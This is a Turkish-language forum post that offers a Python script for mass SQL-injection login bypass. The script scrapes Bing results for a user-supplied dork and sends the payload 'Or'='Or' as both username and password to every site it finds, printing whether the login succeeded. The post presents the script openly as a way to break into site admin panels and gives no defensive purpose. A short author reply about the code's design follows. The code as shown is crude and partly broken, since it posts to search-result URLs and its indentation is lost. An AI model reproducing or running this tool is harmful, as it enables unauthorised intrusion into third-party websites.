Exploit yazılımlarda, bilgisayarlarda yer alan açıklardan, kod hatalarından faydalanmak için geliştirilmiş kodlar ve programlardır. Bu programlar genellikle bir yere sızmayı hedefler. Bugün beraber admin login sql açığından faydalanarak sürekli sitelere giriş yapmaya çalışan ve dorku komple taratan bir kod yazacağız hemen kodu gösterelim.
Kodu gördünüz Belirli bir sql veritabanındaki hatadan admin paneline login olmaya çalışıyor, olursa websitesini gösteriyor ve oldu diyor. Dork yazmanız yeterlidir.
Python:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
from colorama import init, Fore
init(autoreset=True)
def extract_target_site_urls(dork):
search_url = f"https://www.bing.com/search?q={dork}"
response = requests.get(search_url)
soup = BeautifulSoup(response.text, 'html.parser')
links = soup.find_all('a')
site_urls = []
for link in links:
href = link.get('href')
if href and href.startswith('http'):
full_url = urljoin(search_url, href)
site_urls.append(full_url.split('&')[0])
return site_urls
def perform_login(target_url, login_data):
with requests.Session() as session:
login_response = session.post(target_url, data=login_data)
if "success" in login_response.text:
print(Fore.GREEN + "Giriş başarılı!")
else:
print(Fore.RED + "Giriş başarısız.")
if __name__ == "__main__":
dork = input("Dork: ")
target_site_urls = extract_target_site_urls(dork)
if target_site_urls:
for index, target_site_url in enumerate(target_site_urls, start=1):
print(f"\n{Fore.CYAN}Site {index} URL: {target_site_url}")
login_data = {
'username': '''Or'='Or''',
'password': '''Or'='Or'''
}
perform_login(target_site_url, login_data)
else:
print(Fore.YELLOW + "Hata.")Kodu gördünüz Belirli bir sql veritabanındaki hatadan admin paneline login olmaya çalışıyor, olursa websitesini gösteriyor ve oldu diyor. Dork yazmanız yeterlidir.
Moderatör tarafında düzenlendi:
Bu thtnin kod dizaynı eğer ki kodun içeriğini soruyorsan bence gayet düzenli tabi dikkate alırım eleştirini
